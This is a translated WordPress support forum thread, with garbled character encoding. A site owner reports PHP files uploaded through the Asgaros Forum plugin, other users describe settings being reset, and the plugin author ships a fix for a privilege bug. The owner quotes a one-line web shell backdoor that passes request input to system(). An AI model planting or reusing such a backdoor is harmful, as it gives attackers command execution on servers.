Pregunta sobre Asgaros Forum de Wordpress:

VaultPress Nuevas amenazas de seguridad encontradas en androidsage.com

Un usuario pregunt贸 馃憞

Hola. Estoy usando foros de Asgaros. Y hoy, VaultPress (plugin principal de seguridad y respaldo de WordPress) me dio una amenaza de seguridad en el siguiente sitio:

uploads / asgarosforum / 19 / image.php upload / asgarosforum / 20 / image.php upload / asgarosforum / 21 / image.php

Hay un archivo llamado image.php que tiene un c贸digo sospechoso:

if (isset ($ _ REQUEST)[鈥榗md鈥橾)) {@system ($ _ REQUEST[鈥榗md鈥橾); }

Rev铆selo y av铆seme si es seguro y de Asgaros.

Este tema fue modificado hace 3 a帽os, 4 meses por. Este tema fue modificado hace 3 a帽os, 4 meses por. Este tema fue modificado hace 3 a帽os, 4 meses por.

(@yworld)

Hace 3 a帽os, 4 meses

Hola @ sarangsss29 Elimina los archivos (image.php) y cierra temporalmente los archivos adjuntos. Win.Trojan鈥 Compruebe si hay archivos de servidor sospechosos

Esta respuesta fue modificada hace 3 a帽os, 4 meses por. Esta respuesta fue modificada hace 3 a帽os, 4 meses por.

(@drahtigel)

Hace 3 a帽os, 4 meses

Ayer fue el mismo problema. Adem谩s de escribir el archivo especificado (que fue eliminado por el servidor antivirus), el foro de configuraci贸n vol贸 para permitir todo, y la m谩scara retrocedi贸 por defecto. La impresi贸n de que los arreglos simplemente se sobrescribieron. En el foro del tema con ID 1 hab铆a un pu帽ado de aquellos con el nombre Prueba y la Prueba de mensaje con archivo adjunto image.php.

Sin embargo, en otras partes del sitio, no se observ贸 actividad sospechosa.

(@yworld)

Hace 3 a帽os, 4 meses

@drahtigel

La impresi贸n de que los arreglos simplemente se sobrescribieron.

La configuraci贸n cambia a trav茅s de la base de datos

(@drahtigel)

Hace 3 a帽os, 4 meses

La configuraci贸n cambia a trav茅s de la base de datos

驴Hay otra forma de cambiar la configuraci贸n, como ejecutar cualquier script a trav茅s de una vulnerabilidad en WP o foro? Es por eso que el acceso a la base de datos est谩 cerrado desde el exterior. Solo para trabajar con bases de datos, debe ubicarlas en el servidor para conocer el prefijo, conocer la contrase帽a de la base de datos.

(@ sarangsss29)

Hace 3 a帽os, 4 meses

@yworld Gracias por la sugerencia. Los archivos se han eliminado. Ojal谩 no vuelvan a ocurrir. No estoy seguro de si se trata de una inyecci贸n de c贸digo de terceros o si sucedi贸 por defecto en Asgaros. Si es un troyano, 驴c贸mo entr贸 en 茅l?

Despu茅s de eliminar los archivos, el foro recibi贸 la configuraci贸n predeterminada mencionada por @drahtigel

Gracias por toda la ayuda. 驴Qu茅 deber铆a hacer despu茅s?

(@yworld)

Hace 3 a帽os, 4 meses

Carcasa y puerta trasera subidos @drahtigel

(@yworld)

Hace 3 a帽os, 4 meses

@ sarangsss29

驴Qu茅 deber铆a hacer despu茅s?

Espere a que se resuelva el problema. Si es de Asgaros. No est谩 claro qu茅 plugin o WP

Esta respuesta fue modificada hace 3 a帽os, 4 meses por.

(@asgaros)

Hace 3 a帽os, 4 meses

Hola,

gracias por esta informaci贸n. Intentar茅 averiguar qu茅 est谩 pasando.

(@asgaros)

Hace 3 a帽os, 4 meses

@ sarangsss29 @drahtigel @yworld

Acabo de publicar la versi贸n 1.5.8, que deber铆a corregir el error de que los usuarios no administrativos pueden modificar la configuraci贸n del foro. Este error puede haber permitido a un atacante modificar la configuraci贸n para poder cargar archivos PHP.

Instale la 煤ltima versi贸n y env铆eme sus comentarios si esos problemas desaparecieron. 隆Lo siento por los inconvenientes ocasionados! 馃檨

(@yworld)

Hace 3 a帽os, 4 meses

@asgaros 隆Gracias!

(@drahtigel)

Hace 3 a帽os, 4 meses

@asgaros ty

(@ sarangsss29)

Hace 3 a帽os, 4 meses

Si. Creo que el problema se ha ido. Gracias @asgaros

驴Solucion贸 tu problema??

0 / 0

Deja una respuesta 0

Tu direcci贸n de correo electr贸nico no ser谩 publicada. Los campos obligatorios est谩n marcados con *